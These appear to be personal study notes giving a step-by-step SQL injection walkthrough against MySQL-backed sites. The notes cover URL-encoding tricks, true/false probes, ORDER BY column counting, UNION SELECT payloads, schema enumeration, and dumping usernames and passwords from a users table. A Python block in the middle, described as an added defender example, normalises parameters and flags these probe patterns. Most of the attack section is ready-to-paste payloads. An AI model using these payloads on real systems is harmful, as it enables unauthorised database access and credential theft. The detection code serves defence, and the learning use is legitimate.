First you need to know the basics of SQL; go here ⇒ SQL Basic Commands ( using mysql ). To automate SQL injection see SQLmap (Incomplete)
Basic :
%27 - '
%23 or -- (space) or ;-- or ;/* or ;// - for commenting out
always put a space after -- in textboxes / URLs so the rest of the query is commented out
/**/ or + - for spaces
%20 - for space ( mostly used in Burp requests )
Step 1 : Checking if it's vulnerable
If you see a login page or any page link which loads a different page, do this :
Inject a Normal Statement
Inject a normal statement which the website expects. Ex : 1
Inject a True Logical statement
Inject the same but followed by a TRUE SQL logical INJECTION. Ex :
1'+AND+1=1-- If the website displays the same thing as for the first one, it is executing your SQL and is vulnerable.
Inject a False Logical statement
Now use the same input as before but instead give a FALSE logical INJECTION. Ex :
1'+AND+1=0-- If the website gives an error then it is vulnerable to SQL injection, and if the website doesn't give an error it is vulnerable to Blind SQL injection (check below).
Step 2 : Finding out the number of columns and which columns are being displayed
To find the number of columns
Use the ORDER BY command to find how many columns are present
Ex :
1'oRder+bY+1-- Keep increasing the number until the website crashes, and then you know how many columns are present.
Ex : If the website crashes at ordEr+bY+4 then it has 3 columns
To check which columns are being displayed
We can use UNION SELECT to find which columns are being displayed
Ex :
1'UniOn+selecT+1,2,3-- ( assuming it has 3 columns ) and check where 1, 2 or 3 is being displayed on your screen, because some columns are not set to be displayed on the user's screen ( assuming the 2nd column is being displayed )
If it doesn't work :
- It's probably using a different database and not MySQL. To confirm it is still vulnerable you can do :
1'UnIon+sElect+NULL,NULL,NULL-- ⇒ and the website should work normally
- To find out which SQL version it is running, first find which column is being displayed by injecting strings :
1'UnIon+Select+"a","b","c"-- ( assuming "b" is being displayed somewhere ) then do : 1'UnION+SeLect+NULL,(Use all 4 version() commands)-- ⇒ refer to this cheatsheet. Ex : version() works, so the website is using PostgreSQL; use the cheatsheet and use those specific commands
Step 3 : Finding all tables
Note : There is a table called information_schema.tables which lists all the tables present in the database
do : 1'Union+SeleCT+NULL,table_name,NULL+FrOm+information_schema.tables--
( Assuming we found an interesting table called users )
Step 4 : Finding all columns in that table
do : 1'UnIOn+select+NULL,column_name,NULL+from+information_schema.columns+Where+table_name='users'--
( Assuming we find 2 columns, being usernames and passwords )
Step 5 : Reading the content
to see usernames : 1'Union+select+NULL,usernames,NULL+from+users--
to see passwords : 1'Union+select+NULL,passwords,NULL+from+users--
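A defender-side check for the obfuscations listed under Basic and used throughout Steps 1 to 4 (URL-encoded quote, + and /**/ as spaces, mixed-case keywords): an added Python example, not part of the original notes, that normalises a request parameter to one canonical form and then flags the probe patterns. The sample parameters and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request parameters, in the shapes the notes above use
# (URL-encoded quote, '+' for space, '/**/' for space, mixed-case keywords).
SAMPLE_PARAMS = [
    "1",
    "1%27+AND+1=1--",
    "1%27+AND+1=0--",
    "1%27oRder+bY+4--",
    "1%27UniOn+selecT+1,2,3--",
    "1%27UnIon+sElect+NULL,NULL,NULL--",
    "1%27Union/**/SeleCT/**/NULL,table_name,NULL/**/FrOm/**/information_schema.tables--",
    "O%27Brien",  # a legitimate apostrophe must not be flagged
]

# Indicators are matched only after normalisation, so case tricks and
# encoded spaces do not hide them. Names are constructed for this example.
INDICATORS = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "version_probe": re.compile(r"\bversion\s*\("),
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
}

def normalize(value: str) -> str:
    """Undo the obfuscations the notes list so patterns match one canonical form."""
    s = unquote_plus(value)      # %27 -> ', %23 -> #, %20 and '+' -> space
    s = s.replace("/**/", " ")   # inline comment used as a space separator
    s = re.sub(r"\s+", " ", s)   # collapse runs of whitespace
    return s.lower()             # defeat case variation such as UnIoN

def classify(value: str) -> list[str]:
    """Return the names of every indicator that fires on the normalised parameter."""
    s = normalize(value)
    return [name for name, rx in INDICATORS.items() if rx.search(s)]

def scan(params: list[str]) -> dict[str, list[str]]:
    """Map each raw parameter to its indicators; benign values map to an empty list."""
    return {p: classify(p) for p in params}

if __name__ == "__main__":
    for raw, hits in scan(SAMPLE_PARAMS).items():
        print(f"{raw!r:85} -> {hits or 'clean'}")
```

A single quote on its own is deliberately not an indicator; a value such as O'Brien stays clean, while the probes only become visible once the encoding and case variation are stripped.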
If Blind Injection found :
Mostly, injecting SQL statements will cause only a very minor change which is hard to notice; see UDEMY-BUG-BOUNTY-ZSECURITY
If TIME-BASED Injection found :
Here, unlike Blind, there are little to no changes in the website